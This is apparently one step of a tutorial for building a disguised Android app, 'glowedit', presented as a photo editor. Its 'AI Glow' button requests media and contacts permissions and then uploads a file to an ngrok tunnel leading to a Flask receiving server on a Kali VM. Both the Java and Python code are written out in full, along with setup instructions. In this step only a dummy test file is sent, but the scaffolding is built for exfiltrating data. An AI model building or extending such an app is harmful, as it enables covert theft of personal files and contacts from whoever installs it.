open android studio

replace mainactivity.java with this code :

-------

package com.hani.glowedit;

import android.Manifest;
import android.content.pm.PackageManager;
import android.os.Build;
import android.os.Bundle;
import android.os.Environment;
import android.util.Log;
import android.widget.Button;
import android.widget.Toast;

import androidx.annotation.NonNull;
import androidx.appcompat.app.AppCompatActivity;
import androidx.core.app.ActivityCompat;

import java.io.DataOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.net.HttpURLConnection;
import java.net.URL;

public class MainActivity extends AppCompatActivity {

    private static final int PERMISSION_REQUEST_CODE = 1001;
    private static final String SERVER_URL = "https://91ac-103-103-43-185.ngrok-free.app/upload";

    private Button btnAIGlow, btnCropImage;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        btnAIGlow = findViewById(R.id.btnAIGlow);
        btnCropImage = findViewById(R.id.btnCrop);

        btnAIGlow.setOnClickListener(v -> requestAllPermissions());
    }

    private void requestAllPermissions() {
        String[] permissions;

        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.TIRAMISU) {
            permissions = new String[]{
                    Manifest.permission.READ_MEDIA_IMAGES,
                    Manifest.permission.READ_MEDIA_VIDEO,
                    Manifest.permission.READ_MEDIA_AUDIO,
                    Manifest.permission.READ_CONTACTS
            };
        } else {
            permissions = new String[]{
                    Manifest.permission.READ_EXTERNAL_STORAGE,
                    Manifest.permission.READ_CONTACTS
            };
        }

        ActivityCompat.requestPermissions(this, permissions, PERMISSION_REQUEST_CODE);
    }

    @Override
    public void onRequestPermissionsResult(int requestCode, @NonNull String[] permissions,
                                           @NonNull int[] grantResults) {
        super.onRequestPermissionsResult(requestCode, permissions, grantResults);

        if (requestCode == PERMISSION_REQUEST_CODE) {
            boolean allGranted = true;

            for (int result : grantResults) {
                if (result != PackageManager.PERMISSION_GRANTED) {
                    allGranted = false;
                    break;
                }
            }

            if (allGranted) {
                Toast.makeText(this, "All permissions granted!", Toast.LENGTH_SHORT).show();
                uploadTestFile();
            } else {
                Toast.makeText(this, "Please grant all permissions.", Toast.LENGTH_LONG).show();
            }
        }
    }

    private void uploadTestFile() {
        new Thread(() -> {
            try {
                // Test file path
                File file = new File(getFilesDir(), "testfile.txt");

                // Create a small dummy file if it doesn't exist
                if (!file.exists()) {
                    file.createNewFile();
                }

                // HTTP multipart POST
                HttpURLConnection conn;
                DataOutputStream dos;
                String boundary = "*****";
                int bytesRead, bytesAvailable, bufferSize;
                byte[] buffer;
                int maxBufferSize = 1 * 1024 * 1024;

                FileInputStream fileInputStream = new FileInputStream(file);
                URL url = new URL(SERVER_URL);
                conn = (HttpURLConnection) url.openConnection();
                conn.setDoInput(true);
                conn.setDoOutput(true);
                conn.setUseCaches(false);
                conn.setRequestMethod("POST");
                conn.setRequestProperty("Connection", "Keep-Alive");
                conn.setRequestProperty("ENCTYPE", "multipart/form-data");
                conn.setRequestProperty("Content-Type", "multipart/form-data;boundary=" + boundary);
                conn.setRequestProperty("file", file.getName());

                dos = new DataOutputStream(conn.getOutputStream());

                dos.writeBytes("--" + boundary + "\r\n");
                dos.writeBytes("Content-Disposition: form-data; name=\"file\";filename=\"" + file.getName() + "\"\r\n");
                dos.writeBytes("\r\n");

                bytesAvailable = fileInputStream.available();
                bufferSize = Math.min(bytesAvailable, maxBufferSize);
                buffer = new byte[bufferSize];

                bytesRead = fileInputStream.read(buffer, 0, bufferSize);

                while (bytesRead > 0) {
                    dos.write(buffer, 0, bufferSize);
                    bytesAvailable = fileInputStream.available();
                    bufferSize = Math.min(bytesAvailable, maxBufferSize);
                    bytesRead = fileInputStream.read(buffer, 0, bufferSize);
                }

                dos.writeBytes("\r\n");
                dos.writeBytes("--" + boundary + "--\r\n");

                fileInputStream.close();
                dos.flush();
                dos.close();

                int serverResponseCode = conn.getResponseCode();
                runOnUiThread(() -> Toast.makeText(MainActivity.this, "Server response: " + serverResponseCode, Toast.LENGTH_LONG).show());

            } catch (Exception e) {
                Log.e("UploadError", "Exception: " + e.getMessage());
                runOnUiThread(() -> Toast.makeText(MainActivity.this, "Error: " + e.getMessage(), Toast.LENGTH_LONG).show());
            }
        }).start();
    }
}


-----
 go to kali vm -> android_upload_server folder-> open server.py and replace all code with this

------

from flask import Flask, request
import os

app = Flask(__name__)

UPLOAD_FOLDER = 'uploads'
os.makedirs(UPLOAD_FOLDER, exist_ok=True)

@app.route('/')
def index():
    return "Server is running."

@app.route('/upload', methods=['POST'])
def upload_file():
    if 'file' not in request.files:
        return "No file part in the request.", 400

    file = request.files['file']
    if file.filename == '':
        return "No file selected.", 400

    try:
        filepath = os.path.join(UPLOAD_FOLDER, file.filename)
        file.save(filepath)
        return f"File '{file.filename}' uploaded successfully!", 200
    except Exception as e:
        return f"Failed to save file: {str(e)}", 500

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

-------


go to androidmanifest.xml and add this line

<uses-permission android:name="android.permission.INTERNET" />


{{everytime process if using ngrok}}
go to mainactivity.java

and see this line    private static final String SERVER_URL = "https://91ac-103-103-43-185.ngrok-free.app/upload";

(Every time you run new ngrok server then paste the ngrok link in mainactivity.java everytime with (https:...free.app)

Now lets test the app and server response. -->> next file 5
